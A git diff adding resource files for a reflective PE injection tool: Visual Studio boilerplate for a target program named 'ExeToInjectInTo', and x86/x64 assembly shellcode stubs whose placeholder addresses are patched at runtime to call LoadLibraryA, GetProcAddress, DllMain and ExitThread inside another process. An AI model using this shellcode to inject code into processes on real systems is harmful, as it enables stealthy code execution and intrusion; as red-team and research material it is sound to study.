<Keyword>Win32Proj</Keyword> + <RootNamespace>ExeToInjectInTo</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="ExeToInjectInTo.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters new file mode 100644 index 0000000..3ec31be --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters @@ -0,0 +1,36 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="targetver.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ClCompile Include="stdafx.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="ExeToInjectInTo.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt new file mode 100644 index 0000000..3697163 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt @@ -0,0 +1,40 @@ +======================================================================== + CONSOLE APPLICATION : ExeToInjectInTo Project Overview +======================================================================== + +AppWizard has created this ExeToInjectInTo application for you. + +This file contains a summary of what you will find in each of the files that +make up your ExeToInjectInTo application. + + +ExeToInjectInTo.vcxproj + This is the main project file for VC++ projects generated using an Application Wizard. + It contains information about the version of Visual C++ that generated the file, and + information about the platforms, configurations, and project features selected with the + Application Wizard. + +ExeToInjectInTo.vcxproj.filters + This is the filters file for VC++ projects generated using an Application Wizard. + It contains information about the association between the files in your project + and the filters. This association is used in the IDE to show grouping of files with + similar extensions under a specific node (for e.g. ".cpp" files are associated with the + "Source Files" filter). + +ExeToInjectInTo.cpp + This is the main application source file. + +///////////////////////////////////////////////////////////////////////////// +Other standard files: + +StdAfx.h, StdAfx.cpp + These files are used to build a precompiled header (PCH) file + named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj. + +///////////////////////////////////////////////////////////////////////////// +Other notes: + +AppWizard uses "TODO:" comments to indicate parts of the source code you +should add to or customize. + +///////////////////////////////////////////////////////////////////////////// diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp new file mode 100644 index 0000000..20978bb --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// ExeToInjectInTo.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h new file mode 100644 index 0000000..b005a83 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <stdio.h> +#include <tchar.h> + + + +// TODO: reference additional headers your program requires here diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt new file mode 100644 index 0000000..1454ca8 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt @@ -0,0 +1,12 @@ +This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning. + +Compile: +x64: +nasm -f elf64 FileName.asm +ld -o FileName FileName.o +objdump -M intel -d FileName + +x86: +nasm FileName.asm +ld -o FileName FileName.o +objdump -M intel -d FileName
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm new file mode 100644 index 0000000..02d6848 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm @@ -0,0 +1,20 @@ +[SECTION .text] +global _start + +_start: + ; Get stack setup + push rbx + mov rbx, rsp + and sp, 0xff00 + + ; Call DllMain + mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell + mov rdx, 0x1 ; PROCESS_ATTACH + mov r8, 0x0 ; NULL + mov rax, 0x4141414141414141 ; Address of DllMain, set by PS + call rax + + ; Fix stack + mov rsp, rbx + pop rbx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm new file mode 100644 index 0000000..d16cbc9 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm @@ -0,0 +1,14 @@ +[SECTION .text] + +global _start + +_start: + ; Set a var to 1, let PS known exe is exiting + mov rbx, 0x4141414141414141 + mov [rbx], byte 0x01 + + ; Call exitthread instead of exitprocess + sub rsp, 0xc0 + and sp, 0xFFf0 ; Needed for stack alignment + mov rbx, 0x4141414141414141 + call rbx diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm new file mode 100644 index 0000000..edeffd6 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm @@ -0,0 +1,27 @@ +[SECTION .text] + +global _start + +_start: + ; Save state of rbx and stack + push rbx + mov rbx, rsp + + ; Set up stack for function call to GetProcAddress + sub rsp, 0x20 + and sp, 0xffc0 + + ; Call getprocaddress + mov rcx, 0x4141414141414141 ; DllHandle, set by PS + mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS + mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS + call rax + + ; Store the result + mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS + mov [rcx], rax + + ; Restore stack + mov rsp, rbx + pop rbx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm new file mode 100644 index 0000000..7f16471 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm @@ -0,0 +1,23 @@ +[SECTION .text] + +global _start + +_start: + ; Save rsp and setup stack for function call + push rbx + mov rbx, rsp + sub rsp, 0x20 + and sp, 0xffc0 + + ; Call LoadLibraryA + mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS + mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS + call rdx + + mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS + mov [rdx], rax + + ; Fix stack + mov rsp, rbx + pop rbx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm new file mode 100644 index 0000000..41b1034 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm @@ -0,0 +1,23 @@ +[SECTION .text] +global _start + +_start: + ; Get stack setup + push ebx + mov ebx, esp + and esp, 0xfffffff0 + + ; Call DllMain + mov ecx, 0x41414141 ; DLLHandle, set by PowerShell + mov edx, 0x1 ; PROCESS_ATTACH + mov eax, 0x0 ; NULL + push eax + push edx + push ecx + mov eax, 0x41414141 ; Address of DllMain, set by PS + call eax + + ; Fix stack + mov esp, ebx + pop ebx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm new file mode 100644 index 0000000..ce66543 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm @@ -0,0 +1,13 @@ +[SECTION .text] +global _start + +_start: + ; Set a var to 1, let PS know the EXE is exiting + mov ebx, 0x41414141 + mov [ebx], byte 0x01 + + ; Call exitthread instead of exit process + sub esp, 0x20 + and esp, 0xFFFFFFc0 ; Needed for stack alignment + mov ebx, 0x41414141 + call ebx diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm new file mode 100644 index 0000000..bf2ac9e --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm @@ -0,0 +1,28 @@ +[SECTION .text] + +global _start + +_start: + ; Save state of ebx and stack + push ebx + mov ebx, esp + + ; Align stack + and esp, 0xffffffc0 + + ; Call GetProcAddress + mov eax, 0x41414141 ; DllHandle, supplied by PS + mov ecx, 0x41414141 ; Function name, supplied by PS + push ecx + push eax + mov eax, 0x41414141 ; GetProcAddress address, supplied by PS + call eax + + ; Write GetProcAddress return value to an address supplied by PS + mov ecx, 0x41414141 ; Address supplied by PS + mov [ecx], eax + + ; Fix stack + mov esp, ebx + pop ebx + ret |